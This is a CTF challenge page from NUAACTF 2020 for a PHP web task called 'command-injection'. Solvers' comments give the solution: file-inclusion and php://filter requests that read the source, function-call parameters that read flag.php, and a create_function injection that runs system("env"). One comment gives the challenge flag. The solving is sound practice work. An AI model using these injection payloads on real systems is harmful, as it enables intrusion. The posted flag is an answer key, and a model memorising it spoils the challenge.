command-injectionWEB 未解决

分数: 0 金币: 0
所属赛事: NUAACTF 2020
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 321
提  示:
描  述:
nuaactf{}
评论
solomom 4月前

csdn

回复 0

smtall 11月前

createfun.php?func=highlight_file&arg=flag.php

回复 0

vincentshine 1年前

不知道为啥 http://82.157.146.43:10618/include.php?file=index 可以 显示出来,http://82.157.146.43:10618/include.php?file=createfun就不行

回复 0

xiaobai568 2年前

createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试

回复 0

coolsword2023 2年前

createfun.php?func=create_function&&arg=){}system("env");//

回复 0
xiaoxiao972521 2年前

这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php

回复 0

zhaiye 2年前

nuaactf{php_IS_thE_best_language}

回复 0

justsosoloveyou 2年前

html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php

回复 2

hopeinhand 2年前

注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php

回复 5

WriteUp

image
2901600657

3 金币

评分(1)

解题动态

wujita01 攻破了该题 1天前
BLCAKHUANG 攻破了该题 2天前
seyana 攻破了该题 7天前
pigggg 攻破了该题 11天前
mr.zhao 攻破了该题 12天前
annually 攻破了该题 12天前
李逍遥逛霍格沃茨 攻破了该题 13天前
zhuoke 攻破了该题 16天前
tschick 攻破了该题 17天前
mulai 攻破了该题 17天前
路痴通 攻破了该题 23天前
un 攻破了该题 24天前
谢鹤羽 攻破了该题 1月前
shikeerzhi 攻破了该题 1月前
何何 攻破了该题 1月前
AOD 攻破了该题 1月前
司徒草青 攻破了该题 1月前
r1ng_13 攻破了该题 1月前
aguai 攻破了该题 1月前
dyh1213 攻破了该题 1月前
问题反馈